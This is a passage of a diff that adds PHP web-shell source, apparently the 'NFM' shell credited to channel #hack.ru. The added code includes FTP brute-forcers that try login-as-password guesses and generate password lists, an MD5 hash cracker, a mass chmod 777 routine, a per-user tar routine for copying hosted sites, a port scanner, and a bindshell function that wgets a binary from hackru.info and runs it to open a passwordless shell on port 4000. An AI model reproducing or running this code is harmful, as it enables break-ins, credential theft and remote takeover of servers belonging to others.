+fputs($fp, $data);
+
+$ok = fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+print "".exec("chmod 777 $public[1]")."";
+
+print "".exec("chmod 777 $public[2]")."";
+
+print "".exec("chmod 777 $public[3]")."";
+
+print "".exec("chmod 777 $private[1]")."";
+
+print "".exec("chmod 777 $private[2]")."";
+
+print "".exec("chmod 777 $private[3]")."";
+
+print "".exec("chmod 777 $private[4]")."";
+
+print "".exec("chmod 777 $private[5]")."";
+
+print "".exec("chmod 777 $private[6]")."";
+
+print "".exec("chmod 777 $private[7]")."";
+
+print "".exec("chmod 777 $private[8]")."";
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
+print "Some errors occured.";
+
+}
+
+}
+
+}
+
+
+
+
+
+# FTP-bruteforce
+
+function ftp() {
+
+ global $action, $ftp_server, $filename, $HTTP_HOST;
+
+ ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>FTP server: <b>$ftp_server</b></td></tr>";
+
+
+
+ $fpip = @fopen ($filename, "r");
+
+ if ($fpip) {
+
+  while (!feof ($fpip)) {
+
+   $buf = fgets($fpip, 100);
+
+   ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+   $conn_id=ftp_connect($ftp_server);
+
+   if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) {
+
+
+
+   $f=@fopen($HTTP_HOST,"a+");
+
+   fputs($f,"$g[1]:$g[1]\n");
+
+     echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Connected with login:password - ".$g[1].":".$g[1]."</b></td></tr></table>";
+
+
+
+   ftp_close($conn_id);
+
+   fclose($f);
+
+   } else {
+
+    echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>".$g[1].":".$g[1]." - <b>failed</b></td></tr></table>";
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+function tar() {
+
+ global $action, $filename;
+
+ set_time_limit(0);
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data compression</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>According to the different settings of servers, I didn't make default config of NFM. You're to write full path to the domain's folder and then press enter, so all data, containing in this folder will be compressed to tar.gz.<br><br>
+
+<b>Warning!</b><br>File <b>passwd</b> can have big size, so opening all users of this host can waste much time.<br><br>
+
+<b>It's highly recommended!</b><br>Open current function in another window of browser, to compress information, which you're interested in, during your host exploring.</blockquote></td></tr>
+
+</table><br>";
+
+
+
+$http_public="/public_html/";
+
+$fpip = @fopen ($filename, "r");
+
+if ($fpip) {
+
+ while (!feof ($fpip)) {
+
+  $buf = fgets($fpip, 100);
+
+  ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+  $name=$g[1];
+
+  echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<form method='get' action='$PHP_SELF' >
+
+<tr><td align=center colspan=2 class=pagetitle><b>Compression <u>$name.tar.gz</u>:</b></td></tr>
+
+<tr>
+
+<td valign=top><input type=text name=cm size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+
+<td valign=top><input type=submit value='GO' class=button1 $style_button></td>
+
+</tr></form></table>";
+
+  }
+
+ }
+
+}
+
+
+
+# bindshell
+
+function bash() {
+
+ global $action, $port_bind, $pass_key;
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Binding shell</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>Current shell binds 4000 port, you may access to it by telneting to host:4000 port without password.</td></tr>
+
+</table><br>";
+
+
+
+echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='500' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b> Bindshell binary is situated in file called<u><i>s</i></u></b></td></tr>";
+
+
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("wget http://hackru.info/adm/exploits/bash/s")."</b> Downloading...</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("chmod 777 s")."</b> now chmod to 777</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("./s")."</b> now running to 4000 port</td></tr>";
+
+# echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("rm -f s")."</b> Removing file<u>s</u> now...</td></tr>";
+
+echo"</table>";
+
+
+
+ }
+
+
+
+function crypte() {
+
+ global $action,$md5a,$sha1a,$crc32, $key,$string;
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data crypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>Now there are many different programs and scripts, which uses a lot of passwords crypt methods (Do you remember what a phpBB is?=)), so with NFM you can crypt some strings to hashes, because sometimes you may need to change somebodyes data with your one =). Also you may change your pass to NFM here.</blockquote></td></tr>
+
+</table>";
+
+
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Here are some useful cryption methods, which uses MHASH lib:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>MD5 </b>(Very popular and fast method)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".md5($md5a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$md5a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox'type='text' name='md5a' size='50' value='' id='md5a'></td>
+
+ <td align=center width=100><input type='submit' value='Crypt MD5' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>SHA1 </b>(SHA1 - method to crypt with open key, It's very usefull too)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".sha1($sha1a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$sha1a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='sha1a' size='50' value='' id='sha1a'>
+
+ </td><td align=center width=100><input type='submit' value='Crypt SHA1' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>CRC32 </b>(Most used when making CRC check of data, but you can find a host with forum, with passwords, crypted by CRC32)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".crc32($crc32)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$crc32."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='crc32' size='50' value='' id='crc32'></td><td width=100 align=center><input type='submit' value='Crypt CRC32' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+
+
+ }
+
+
+
+function decrypte() {
+
+ global $action,$pass_de,$chars_de,$dat,$date;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data decrypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>It's known all over the world, that MD5 crypt algorithm has no way to decrypt it, because it uses hashes. The one and only one way to try read what the hash is - to generate some hashes and then to compare them with source hash needed to be decrypted ... So this is bruteforce.</blockquote></td></tr>
+
+</table>";
+
+
+
+if($chars_de==""){$chars_de="";}
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=decrypte' method=post name=hackru><tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Data decrypter:</b></td></tr>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>Decrypt MD5</b>(decryption time depends on the length or crypted word, may take a long time)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400 >&nbsp;MD5 hash:&nbsp;&nbsp;<font color=#ffffcc><b>".$pass_de."</b></font></td><td width=100 align=center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=reset value=Clear class=button1 $style_button></td>
+
+  <tr><td align=left width=400 >&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<textarea  class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td>
+
+  <td class=pagetitle width=120 valign=top><b>Symvols for bruteforce:</b><br><font color=red><b><u>ENG:</u></b></font>
+
+   <a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a>
+
+<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a>
+
+<a class=menu href=javascript:ins('0123456789')>[0-9]</a>
+
+<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?&gt;<[]{}:?.,&quot;')>[Symvols]</a><br><br>
+
+<font color=red><b><u>RUS:</u></b></font>
+
+<a class=menu href=javascript:ins('?????????????????????????????????')>[?-?]</a>
+
+<a class=menu href=javascript:ins('?????????????????????????????????')>[?-?]</a>
+
+</td></tr>
+
+<tr><td align=center width=400>
+
+<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''></td><td width=100 align=center><input type='submit' value='Decrypt MD5' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+if($_POST[pass_de]){
+
+$pass_de=htmlspecialchars($pass_de);
+
+$pass_de=stripslashes($pass_de);
+
+$dat=date("H:i:s");
+
+$date=date("d:m:Y");
+
+
+
+crack_md5();
+
+}
+
+}
+
+
+
+function crack_md5() {
+
+global $chars_de;
+
+$chars=$_POST[chars];
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+$chars_de=str_replace("<",chr(60),$chars_de);
+
+$chars_de=str_replace(">",chr(62),$chars_de);
+
+$c=strlen($chars_de);
+
+for ($next = 0; $next <= 31; $next++) {
+
+for ($i1 = 0; $i1 <= $c; $i1++) {
+
+$word[1] = $chars_de{$i1};
+
+for ($i2 = 0; $i2 <= $c; $i2++) {
+
+$word[2] = $chars_de{$i2};
+
+if ($next <= 2) {
+
+result(implode($word));
+
+}else {
+
+for ($i3 = 0; $i3 <= $c; $i3++) {
+
+$word[3] = $chars_de{$i3};
+
+if ($next <= 3) {
+
+result(implode($word));
+
+}else {
+
+for ($i4 = 0; $i4 <= $c; $i4++) {
+
+$word[4] = $chars_de{$i4};
+
+if ($next <= 4) {
+
+result(implode($word));
+
+}else {
+
+for ($i5 = 0; $i5 <= $c; $i5++) {
+
+$word[5] = $chars_de{$i5};
+
+if ($next <= 5) {
+
+result(implode($word));
+
+}else {
+
+for ($i6 = 0; $i6 <= $c; $i6++) {
+
+$word[6] = $chars_de{$i6};
+
+if ($next <= 6) {
+
+result(implode($word));
+
+}else {
+
+for ($i7 = 0; $i7 <= $c; $i7++) {
+
+$word[7] = $chars_de{$i7};
+
+if ($next <= 7) {
+
+result(implode($word));
+
+}else {
+
+for ($i8 = 0; $i8 <= $c; $i8++) {
+
+$word[8] = $chars_de{$i8};
+
+if ($next <= 8) {
+
+result(implode($word));
+
+}else {
+
+for ($i9 = 0; $i9 <= $c; $i9++) {
+
+$word[9] = $chars_de{$i9};
+
+if ($next <= 9) {
+
+result(implode($word));
+
+}else {
+
+for ($i10 = 0; $i10 <= $c; $i10++) {
+
+$word[10] = $chars_de{$i10};
+
+if ($next <= 10) {
+
+result(implode($word));
+
+}else {
+
+for ($i11 = 0; $i11 <= $c; $i11++) {
+
+$word[11] = $chars_de{$i11};
+
+if ($next <= 11) {
+
+result(implode($word));
+
+}else {
+
+for ($i12 = 0; $i12 <= $c; $i12++) {
+
+$word[12] = $chars_de{$i12};
+
+if ($next <= 12) {
+
+result(implode($word));
+
+}else {
+
+for ($i13 = 0; $i13 <= $c; $i13++) {
+
+$word[13] = $chars_de{$i13};
+
+if ($next <= 13) {
+
+result(implode($word));
+
+}else {
+
+for ($i14 = 0; $i14 <= $c; $i14++) {
+
+$word[14] = $chars_de{$i14};
+
+if ($next <= 14) {
+
+result(implode($word));
+
+}else {
+
+for ($i15 = 0; $i15 <= $c; $i15++) {
+
+$word[15] = $chars_de{$i15};
+
+if ($next <= 15) {
+
+result(implode($word));
+
+}else {
+
+for ($i16 = 0; $i16 <= $c; $i16++) {
+
+$word[16] = $chars_de{$i16};
+
+if ($next <= 16) {
+
+result(implode($word));
+
+}else {
+
+for ($i17 = 0; $i17 <= $c; $i17++) {
+
+$word[17] = $chars_de{$i17};
+
+if ($next <= 17) {
+
+result(implode($word));
+
+}else {
+
+for ($i18 = 0; $i18 <= $c; $i18++) {
+
+$word[18] = $chars_de{$i18};
+
+if ($next <= 18) {
+
+result(implode($word));
+
+}else {
+
+for ($i19 = 0; $i19 <= $c; $i19++) {
+
+$word[19] = $chars_de{$i19};
+
+if ($next <= 19) {
+
+result(implode($word));
+
+}else {
+
+for ($i20 = 0; $i20 <= $c; $i20++) {
+
+$word[20] = $chars_de{$i20};
+
+if ($next <= 20) {
+
+result(implode($word));
+
+}else {
+
+for ($i21 = 0; $i21 <= $c; $i21++) {
+
+$word[21] = $chars_de{$i21};
+
+if ($next <= 21) {
+
+result(implode($word));
+
+}else {
+
+for ($i22 = 0; $i22 <= $c; $i22++) {
+
+$word[22] = $chars_de{$i22};
+
+if ($next <= 22) {
+
+result(implode($word));
+
+}else {
+
+for ($i23 = 0; $i23 <= $c; $i23++) {
+
+$word[23] = $chars_de{$i23};
+
+if ($next <= 23) {
+
+result(implode($word));
+
+}else {
+
+for ($i24 = 0; $i24 <= $c; $i24++) {
+
+$word[24] = $chars_de{$i24};
+
+if ($next <= 24) {
+
+result(implode($word));
+
+}else {
+
+for ($i25 = 0; $i25 <= $c; $i25++) {
+
+$word[25] = $chars_de{$i25};
+
+if ($next <= 25) {
+
+result(implode($word));
+
+}else {
+
+for ($i26 = 0; $i26 <= $c; $i26++) {
+
+$word[26] = $chars_de{$i26};
+
+if ($next <= 26) {
+
+result(implode($word));
+
+}else {
+
+for ($i27 = 0; $i27 <= $c; $i27++) {
+
+$word[27] = $chars_de{$i27};
+
+if ($next <= 27) {
+
+result(implode($word));
+
+}else {
+
+for ($i28 = 0; $i28 <= $c; $i28++) {
+
+$word[28] = $chars_de{$i28};
+
+if ($next <= 28) {
+
+result(implode($word));
+
+}else {
+
+for ($i29 = 0; $i29 <= $c; $i29++) {
+
+$word[29] = $chars_de{$i29};
+
+if ($next <= 29) {
+
+result(implode($word));
+
+}else {
+
+for ($i30 = 0; $i30 <= $c; $i30++) {
+
+$word[30] = $chars_de{$i30};
+
+if ($next <= 30) {
+
+result(implode($word));
+
+}else {
+
+for ($i31 = 0; $i31 <= $c; $i31++) {
+
+$word[31] = $chars_de{$i31};
+
+if ($next <= 31) {
+
+result(implode($word));
+
+
+
+}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
+
+
+
+function result($word) {
+
+global $dat,$date;
+
+$pass_de=$_POST[pass_de];
+
+$dat2=date("H:i:s");
+
+$date2=date("d:m:Y");
+
+
+
+if(md5($word)==$pass_de){
+
+print "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp; Brutefrcing result:</td></tr>
+
+  <tr><td class=pagetitle width=400>&nbsp;&nbsp;<b>crypted Hash:</b></td><td class=pagetitle width=100><font color=red>&nbsp;&nbsp;<b>$word</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce start:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat - $date</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce finish:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat2 - $date2</b></font></td></tr>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp;result was wrote to file:  <b>".$word."_md5</b></td></tr>
+
+</table>
+
+                            ";
+
+							$f=@fopen($word._md5,"a+");
+
+                            fputs($f,"Decrypted MD5 hash [$pass_de] = $word\nBruteforce start:\t$dat - $date\Bruteforce finish:\t$dat2 - $date2\n ");
+
+                             exit;}
+
+
+
+
+
+
+
+}
+
+
+
+function brut_ftp() {
+
+ global $action,$private_site, $title_exp,$login, $host, $file, $chislo, $proverka;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>FTP bruteforce</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>This is new ftp-bruteforcer it can make his own brute passwords list on the fly he needs nothing to do it, so It's not a problem for you to bryte any ftp account now. But do not write very big value of passwords (10000 will be quite enough) because it mat couse a very heavy server overload . </blockquote></td></tr>
+
+</table>";
+
+
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=brut_ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Brut FTP:</b></td></tr>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>FTP bruteforce</b>(full bruteforce, you are only to enter a value of number of passwords and brute will begin from password-list file, which script generates itself on the fly!)</td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Number of passwords:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='chislo' size=10></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Password to test:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='proverka' size=50></td></tr>
+
+<tr><td width=500 align=center colspan=2><input type='submit' value='FTP brute start' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+function s() {
+
+   $word="qwrtypsdfghjklzxcvbnm";
+
+   return $word[mt_rand(0,strlen($word)-1)];
+
+}
+
+
+
+function g() {
+
+   $word="euioam";
+
+   return $word[mt_rand(0,strlen($word)-2)];
+
+}
+
+
+
+function name0() {   return s().g().s();                        }
+
+function name1() {   return s().g().s().g();                    }
+
+function name2() {   return s().g().g().s();                    }
+
+function name3() {   return s().s().g().s().g();                }
+
+function name4() {   return g().s().g().s().g();                }
+
+function name5() {   return g().g().s().g().s();                }
+
+function name6() {   return g().s().s().g().s();                }
+
+function name7() {   return s().g().g().s().g();                }
+
+function name8() {   return s().g().s().g().g();                }
+
+function name9() {   return s().g().s().g().s().g();            }
+
+function name10() {   return s().g().s().s().g().s().s();        }
+
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+
+
+function randword() {
+
+   global $cool;
+
+   $func="name".mt_rand(0,11);
+
+   $func2="name".mt_rand(0,11);
+
+   switch (mt_rand(0,11)) {
+
+      case 0: return $func().mt_rand(5,99);
+
+      case 1: return $func()."-".$func2();
+
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+
+      case 3: return $func()."!".$func();
+
+      case 4: return randpass(mt_rand(5,12));
+
+      default: return $func();
+
+   }
+
+
+
+
+
+}
+
+
+
+function randpass($len) {
+
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+
+   $s="";
+
+   for ($i=0; $i<$len; $i++) {
+
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+
+   }
+
+   return $s;
+
+}
+
+if (@unlink("pass.txt") < 0){
+
+echo "nothing";
+
+exit;
+
+}
+
+$file="pass.txt";
+
+if($file && $host && $login){
+
+   $cn=mt_rand(30,30);
+
+for ($i=0; $i<$cn; $i++) {
+
+   $s=$cool2[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$s\n");
+
+   }
+
+
+
+  $cnt2=mt_rand(43,43);
+
+for ($i=0; $i<$cnt2; $i++) {
+
+   $r=$cool[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$login$r\n");
+
+}
+
+$p="$proverka";
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$p\n");
+
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+
+   for ($i=0; $i<$cnt3; $i++) {
+
+   $u=randword();
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$u\n");
+
+  }
+
+
+
+  if(is_file($file)){
+
+ $passwd=file($file,1000);
+
+  for($i=0; $i<count($passwd); $i++){
+
+   $stop=false;
+
+   $password=trim($passwd[$i]);
+
+   $open_ftp=@fsockopen($host,21);
+
+    if($open_ftp!=false){
+
+     fputs($open_ftp,"user $login\n");
+
+     fputs($open_ftp,"pass $password\n");
+
+     while(!feof($open_ftp) && $stop!=true){
+
+      $text=fgets($open_ftp,4096);
+
+      if(preg_match("/230/",$text)){
+
+       $stop=true;
+
+	   $f=@fopen($host._ftp,"a+");
+
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+
+
+       echo "
+
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b><font color=\"blue\">Congratulations! Password is known now.</font></b><br>
+
+&nbsp;&nbsp;Connected to: <b>$host</b><br>&nbsp;&nbsp;with login: <b>$login</b><br>&nbsp;&nbsp;with password: <b>$password</b></td></tr></table>
+
+";exit;
+
+      }
+
+      elseif(preg_match("/530/",$text)){
+
+       $stop=true;
+
+
+
+      }
+
+     }
+
+     fclose($open_ftp);
+
+   }else{
+
+    echo "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>FTP is incorrect!!! At <b><u>$host</u></b> 21 port is closed! check your settings</b></b></td></tr>
+
+</table>
+
+";exit;
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+}
+
+
+
+# port scanner
+
+function portscan() {
+
+ global $action,$portscan,$port,$HTTP_HOST,$min,$max;
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time1 = $mtime;
+
+
+
+ $id = $HTTP_HOST;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Scan results:</b>&nbsp;&nbsp;$id</td></tr><tr><td valign=top class=pagetitle >Scanning host to find any reachable and open ports" . "...<br></td></tr></table>";
+
+
+
+ $lport = $min;
+
+ $hport = $max;
+
+ $op = 0;
+
+ $gp = 0;
+
+
+
+ for ($porta=$lport; $porta<=$hport; $porta++) {
+
+  $fp = @fsockopen("$id", $porta, &$errno, &$errstr, 4);
+
+  if ( !$fp ) { $gp++; }
+
+  else {
+
+   $port_addres = $port[$porta];
+
+   if($port_addres == "") $port_addres = "unknown";
+
+   $serv = getservbyport($porta, TCP);
+
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#FFFFCC BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center width=10%>Port:<b>$porta / $serv</b></td><td align=center width=80%>$port_addres</td><td align=center width=10%>(<a href=\"http://www.google.de/search?q=%22$port_addres2%22&ie=ISO-8859-1&hl=de&btnG=Google+Suche&meta=\" target=_blank>What's the service is?</a>)</td></tr>";
+
+   $op++;
+
+  }
+
+ }
+
+
+
+ if($op == 0) echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Current host seems don't have any open port...hmm, but you're connected to it to 80...check out firewall</b></td></tr></table>";
+
+
+
+ $unsi = ($op/$porta)*100;
+
+ $unsi = round($unsi);
+
+
+
+ echo "<tr><td align=center width=100% bgcolor=#184984 class=pagetitle colspan=3><b>Scan statistics:</b></b></td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Scanned ports:</b>&nbsp;&nbsp;$porta</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Open ports:</b>&nbsp;&nbsp;$op</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Closed ports:</b>&nbsp;&nbsp;$gp</td></tr>";
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time2 = $mtime;
+
+ $loadtime = ($time2 - $time1);
+
+ $loadtime = round($loadtime, 2);
+
+
+
+ echo "<tr colspan=2><td align=center width=100% colspan=3><b>Scan time:</b>&nbsp;&nbsp;$loadtime seconds</tr></table>";
+
+}
+
+
+
+function nfm_copyright() {
+
+global $action,$upass,$uname,$nfm;
+
+ return "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#000000' face='Tahoma' size = 2><b>Powered by channel #hack.ru (author xoce). Made In Russia </b></font></center></td></tr></table></body></html>";
+
+
+
+}
+
+// =-=-=-=-= SQL MODULE =-=-=-=-=
+
+// SQL functions start
+
+function aff_date() {
+
+ $date_now=date("F j,Y,g:i a");
+
+ return $date_now;
+
+}
+
+
+
+function sqldumptable($table) {
+
